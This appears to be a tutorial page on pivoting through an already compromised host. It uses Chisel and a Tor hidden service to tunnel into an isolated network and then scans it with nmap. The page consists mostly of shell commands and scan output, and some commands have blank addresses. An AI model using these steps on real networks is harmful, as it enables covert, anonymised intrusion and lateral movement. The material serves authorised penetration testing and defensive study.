Pivoting with hidden-portforwarding and Chisel

At this point, Victim1 is already compromised. In order to reach Victim2 (the network-isolated machine), we will use Victim1 as a pivot. To achieve our goal, we will use hidden-portforwarding together with Chisel.

As shown in the following illustration, the victim will publish a Hidden Service that routes TCP traffic to the Chisel Server (running in the pivot). Once the Chisel server is reached from the Chisel client, an SOCKS5+HTTP tunnel is established so that we can send packets through it.

1. Run Chisel Server in the pivot

As described in the Chisel documentation, we can start the Chisel server as a SOCKS5 proxy by executing the following command:

[victim1]$ ./chisel server -p 1111 --socks5 &

Now Chisel server is ready to get connections from the Chisel client.

2. Chisel Server reachable from Tor

In order to reach the Chisel Server from the Chisel Client preserving the anonimity, we will use hidden-portforwarding. This tool will allow us to redirect TCP packets from a new Hidden Service to the TCP port where Chisel Server is listening.

The tool will need to receive:

1) the -data-dir parameter to preserve the onion address,

2) the -hidden-port parameter with the port you want for the Hidden Service and

3) the -forward parameter with the TCP socket you want to send traffix to.

[victim1]$ ./hidden-portforwarding -data-dir /tmp/pf-datadir \
    -hidden-port 9001 -forward 
Forwarding xa7ljkruk7lra4el.onion:9001 ->

Using -data-dir parameter is specially important here. It will contain the keys for the Hidden Service so that the onion address doesn't change. If not specified, each execution will create a different Hidden Service.

3. Chisel tunnel establishment

Now that Chisel Server is reachable though the hidden-portforwarding tool, we will connect from Chisel Client. We can set the --proxy parameter to use the Tor instance proxy:

[attacker]$ alias chisel-client-tor='chisel client --proxy socks://'
[attacker]$ chisel-client-tor xa7ljkruk7lra4el.onion:9001 socks &

Now, Chisel Client is serving a SOCKS5 proxy on 1080 port that will route traffic to the Chisel Server:

[attacker]$ ss -lntp | grep chisel
LISTEN 0   4096*  users:(("chisel",pid=3730,fd=3))

4. Send traffic through the tunnel

In order to connect to the SOCKS5 proxy that Chisel Client serves, we will use proxychains4:

[attacker]$ alias pc4='proxychains4 -f /etc/proxychains4.conf'
[attacker]$ cat /etc/proxychains4.conf
socks5 1080

Now, let's try a simple port scanning against Victim2:

[attacker]$ pc4 nmap -sT -Pn -n -sV -sC -p80,22,25,3000 victim2
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
25/tcp   open  smtp    Postfix smtpd
80/tcp   open  http    Apache httpd 2.4.43 (() PHP/5.4.16)
3000/tcp open  http    Mongoose httpd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 230.37 seconds

Every packet will go through a SOCKS5 proxy over the Tor network. Traffic intensive tools, such as nmap, will decrease their performance significantly due to the high latency. You should try to run this tools directly from pivot; for example, by using static compiled versions of these tools.

Last updated